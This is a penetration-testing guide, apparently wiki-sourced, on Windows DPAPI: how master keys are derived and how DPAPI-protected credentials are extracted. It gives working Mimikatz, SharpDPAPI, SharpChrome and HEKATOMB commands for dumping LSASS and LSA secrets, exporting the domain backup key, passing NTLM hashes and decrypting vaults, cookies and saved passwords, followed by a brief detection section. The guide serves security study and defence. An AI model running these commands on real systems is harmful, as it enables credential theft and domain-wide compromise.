DPAPI - Extracting Passwords

Reading time: 12 minutes

What is DPAPI

The Data Protection API (DPAPI) is primarily utilized within the Windows operating system for the symmetric encryption of asymmetric private keys, leveraging either user or system secrets as a significant source of entropy. This approach simplifies encryption for developers by enabling them to encrypt data using a key derived from the user's logon secrets or, for system encryption, the system's domain authentication secrets, thus obviating the need for developers to manage the protection of the encryption key themselves.

The most common way to use DPAPI is through the CryptProtectData and CryptUnprotectData functions, which allow applications to encrypt and decrypt data securely with the session of the process that is currently logged on. This means that the encrypted data can only be decrypted by the same user or system that encrypted it.

Moreover, these functions accepts also an entropy parameter which will also be used during encryption and decryption, therefore, in order to decrypt something encrypted using this parameter, you must provide the same entropy value that was used during encryption.

Users key generation

The DPAPI generates a unique key (called pre-key) for each user based on their credentials. This key is derived from the user's password and other factors and the algorithm depends on the type of user but ends being a SHA1. For example, for domain users, it depends on the HTLM hash of the user.

This is specially interesting because if an attacker can obtain the user's password hash, they can:

• Decrypt any data that was encrypted using DPAPI with that user's key without needing to contact any API
• Try to crack the password offline trying to generate the valid DPAPI key

Moreover, every time some data is encrypted by a user using DPAPI, a new master key is generated. This master key is the one actually used to encrypt data. Each master key is given with a GUID (Globally Unique Identifier) that identifies it.

The master keys are stored in the %APPDATA%\Microsoft\Protect\<sid>\<guid> directory, where {SID} is the Security Identifier of that user. The master key is stored encrypted by the user's pre-key and also by a domain backup key for recovery (so the same key is stored encrypted 2 times by 2 different pass).

Note that the domain key used to encrypt the master key is in the domain controllers and never changes, so if an attacker has access to the domain controller, they can retrieve the domain backup key and decrypt the master keys of all users in the domain.

The encrypted blobs contain the GUID of the master key that was used to encrypt the data inside its headers.

Find master keys:

Get-ChildItem C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem C:\Users\USER\AppData\Local\Microsoft\Protect
Get-ChildItem -Hidden C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\USER\AppData\Local\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\USER\AppData\Roaming\Microsoft\Protect\{SID}
Get-ChildItem -Hidden C:\Users\USER\AppData\Local\Microsoft\Protect\{SID}

This is what a bunch of Master Keys of a user will looks like:

Machine/System key generation

This is key used for the machine to encrypt data. It's based on the DPAPI_SYSTEM LSA secret, which is a special key that only the SYSTEM user can access. This key is used to encrypt data that needs to be accessible by the system itself, such as machine-level credentials or system-wide secrets.

Note that these keys don't have a domain backup so they are only accesisble locally:

• Mimikatz can access it dumping LSA secrets using the command: mimikatz lsadump::secrets
• The secret is stored inside the registry, so an administrator could modify the DACL permissions to access it. The registry path is: HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets\DPAPI_SYSTEM

Protected Data by DPAPI

Among the personal data protected by DPAPI are:

• Windows creds
• Internet Explorer and Google Chrome's passwords and auto-completion data
• E-mail and internal FTP account passwords for applications like Outlook and Windows Mail
• Passwords for shared folders, resources, wireless networks, and Windows Vault, including encryption keys
• Passwords for remote desktop connections, .NET Passport, and private keys for various encryption and authentication purposes
• Network passwords managed by Credential Manager and personal data in applications using CryptProtectData, such as Skype, MSN messenger, and more
• Encrypted blobs inside the register
• ...

System protected data includes:

• Wifi passwords
• Scheduled task passwords
• ...

Master key extraction options

• If the user has domain admin privileges, they can access the domain backup key to decrypt all user master keys in the domain:

# Mimikatz
lsadump::backupkeys /system:<DOMAIN CONTROLLER> /export

# SharpDPAPI
SharpDPAPI.exe backupkey [/server:SERVER.domain] [/file:key.pvk]

• With local admin privileges, it's possible to access the LSASS memory to extract the DPAPI master keys of all the connected users and the SYSTEM key.

# Mimikatz
mimikatz sekurlsa::dpapi

• If the user has local admin privileges, they can access the DPAPI_SYSTEM LSA secret to decrypt the machine master keys:

# Mimikatz
lsadump::secrets /system:DPAPI_SYSTEM /export

• If the password or hash NTLM of the user is known, you can decrypt the master keys of the user directly:

# Mimikatz
dpapi::masterkey /in:<C:\PATH\MASTERKEY_LOCATON> /sid:<USER_SID> /password:<USER_PLAINTEXT> /protected

# SharpDPAPI
SharpDPAPI.exe masterkeys /password:PASSWORD

• If you are inside a session as the user, it's possible to ask the DC for the backup key to decrypt the master keys using RPC. If you are local admin and the user is logged in, you could steal his session token for this:

# Mimikatz
dpapi::masterkey /in:"C:\Users\USER\AppData\Roaming\Microsoft\Protect\SID\GUID" /rpc

# SharpDPAPI
SharpDPAPI.exe masterkeys /rpc

List Vault

# From cmd
vaultcmd /listcreds:"Windows Credentials" /all

# From mimikatz
mimikatz vault::list

Access DPAPI Encrypted Data

Find DPAPI Encrypted data

Common users files protected are in:

• C:\Users\username\AppData\Roaming\Microsoft\Protect\*
• C:\Users\username\AppData\Roaming\Microsoft\Credentials\*
• C:\Users\username\AppData\Roaming\Microsoft\Vault\*
• Check also changing \Roaming\ to \Local\ in the above paths.

Enumeration examples:

dir /a:h C:\Users\username\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\

SharpDPAPI can find DPAPI encrypted blobs in the file system, registry and B64 blobs:

# Search blobs in the registry
search /type:registry [/path:HKLM] # Search complete registry by default

# Search blobs in folders
search /type:folder /path:C:\path\to\folder
search /type:folder /path:C:\Users\username\AppData\

# Search a blob inside a file
search /type:file /path:C:\path\to\file

# Search a blob inside B64 encoded data
search /type:base64 [/base:<base64 string>]

Note that SharpChrome (from the same repo) can be used to decrypt using DPAPI sensitive data like cookies.

Access keys and data

• Use SharpDPAPI to get credentials from DPAPI encrypted files from the current session:

# Decrypt user data
## Note that 'triage' is like running credentials, vaults, rdg and certificates
SharpDPAPI.exe [credentials|vaults|rdg|keepass|certificates|triage] /unprotect

# Decrypt machine data
SharpDPAPI.exe machinetriage 

• Get credentials info like the encrypted data and the guidMasterKey.

mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\28350839752B38B238E5D56FDD7891A7

[...]
guidMasterKey      : {3e90dd9e-f901-40a1-b691-84d7f647b8fe}
[...]
pbData             : b8f619[...snip...]b493fe
[..]

• Access masterkeys:

Decrypt a masterkey of a user requesting the domain backup key using RPC:

# Mimikatz
dpapi::masterkey /in:"C:\Users\USER\AppData\Roaming\Microsoft\Protect\SID\GUID" /rpc

# SharpDPAPI
SharpDPAPI.exe masterkeys /rpc

The SharpDPAPI tool also supports these arguments for masterkey decryption (note how it's possible to use /rpc to get the domains backup key, /password to use a plaintext password, or /pvk to specify a DPAPI domain private key file...):

/target:FILE/folder     -   triage a specific masterkey, or a folder full of masterkeys (otherwise triage local masterkeys)
/pvk:BASE64...          -   use a base64'ed DPAPI domain private key file to first decrypt reachable user masterkeys
/pvk:key.pvk            -   use a DPAPI domain private key file to first decrypt reachable user masterkeys
/password:X             -   decrypt the target user's masterkeys using a plaintext password (works remotely)
/ntlm:X                 -   decrypt the target user's masterkeys using a NTLM hash (works remotely)
/credkey:X              -   decrypt the target user's masterkeys using a DPAPI credkey (domain or local SHA1, works remotely)
/rpc                    -   decrypt the target user's masterkeys by asking domain controller to do so
/server:SERVER          -   triage a remote server, assuming admin access
/hashes                 -   output usermasterkey file 'hashes' in JTR/Hashcat format (no decryption)

• Decrypt data using a masterkey:

# Mimikatz
dpapi::cred /in:C:\path\to\encrypted\file /masterkey:<MASTERKEY>

# SharpDPAPI
SharpDPAPI.exe /target:<FILE/folder> /ntlm:<NTLM_HASH>

The SharpDPAPI tool also supports these arguments for credentials|vaults|rdg|keepass|triage|blob|ps decryption (note how it's possible to use /rpc to get the domains backup key, /password to use a plaintext password, /pvk to specify a DPAPI domain private key file, /unprotect to use current users session...):

Decryption:
/unprotect          -   force use of CryptUnprotectData() for 'ps', 'rdg', or 'blob' commands
/pvk:BASE64...      -   use a base64'ed DPAPI domain private key file to first decrypt reachable user masterkeys
/pvk:key.pvk        -   use a DPAPI domain private key file to first decrypt reachable user masterkeys
/password:X         -   decrypt the target user's masterkeys using a plaintext password (works remotely)
/ntlm:X             -   decrypt the target user's masterkeys using a NTLM hash (works remotely)
/credkey:X          -   decrypt the target user's masterkeys using a DPAPI credkey (domain or local SHA1, works remotely)
/rpc                -   decrypt the target user's masterkeys by asking domain controller to do so
GUID1:SHA1 ...      -   use a one or more GUID:SHA1 masterkeys for decryption
/mkfile:FILE        -   use a file of one or more GUID:SHA1 masterkeys for decryption

Targeting:
/target:FILE/folder -   triage a specific 'Credentials','.rdg|RDCMan.settings', 'blob', or 'ps' file location, or 'Vault' folder
/server:SERVER      -   triage a remote server, assuming admin access
                        Note: must use with /pvk:KEY or /password:X
                        Note: not applicable to 'blob' or 'ps' commands

• Decrypt some data using current user session:

# Mimikatz
dpapi::blob /in:C:\path\to\encrypted\file /unprotect

# SharpDPAPI
SharpDPAPI.exe blob /target:C:\path\to\encrypted\file /unprotect

Access other machine data

In SharpDPAPI and SharpChrome you can indicate the /server:HOST option to access a remote machine's data. Of course you need to be able to access that machine and in the following example it's supposed that the domain backup encryption key is known:

SharpDPAPI.exe triage /server:HOST /pvk:BASE64
SharpChrome cookies /server:HOST /pvk:BASE64

Other tools

HEKATOMB

HEKATOMB is a tool that automates the extraction of all users and computers from the LDAP directory and the extraction of domain controller backup key through RPC. The script will then resolve all computers ip address and perform a smbclient on all computers to retrieve all DPAPI blobs of all users and decrypt everything with domain backup key.

python3 hekatomb.py -hashes :ed0052e5a66b1c8e942cc9481a50d56 DOMAIN.local/administrator@10.0.0.1 -debug -dnstcp

With extracted from LDAP computers list you can find every sub network even if you didn't know them !

DonPAPI

DonPAPI can dump secrets protected by DPAPI automatically.

Common detections

• Access to files in C:\Users\*\AppData\Roaming\Microsoft\Protect\*, C:\Users\*\AppData\Roaming\Microsoft\Credentials\* and other DPAPI-related directories.
  • Specially from a network share like C$ or ADMIN$.
• Use of Mimikatz to access LSASS memory.
• Event 4662: An operation was performed on an object.
  • This event can be checked to see if the BCKUPKEY object was accessed.

References

• https://www.passcape.com/index.php?section=docsys&cmd=details&id=28#13
• https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++